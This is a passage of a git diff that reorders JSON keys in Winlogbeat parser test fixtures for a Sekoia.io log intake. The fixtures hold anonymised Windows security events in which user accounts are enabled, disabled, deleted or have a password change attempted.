"{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json
index 34874fdfb..ac581308e 100644
--- a/Beats/winlogbeat/tests/security_event_4723.json
+++ b/Beats/winlogbeat/tests/security_event_4723.json
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional 
Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 
Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json
index 31cca5f97..d3826be97 100644
--- a/Beats/winlogbeat/tests/security_event_4725.json
+++ b/Beats/winlogbeat/tests/security_event_4725.json
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity 
ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account 
Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json
index e147e2eb4..73c1d823c 100644
--- a/Beats/winlogbeat/tests/security_event_4726.json
+++ b/Beats/winlogbeat/tests/security_event_4726.json
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user 
account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}" + } }, "expected": { "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount 
Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}",
diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json
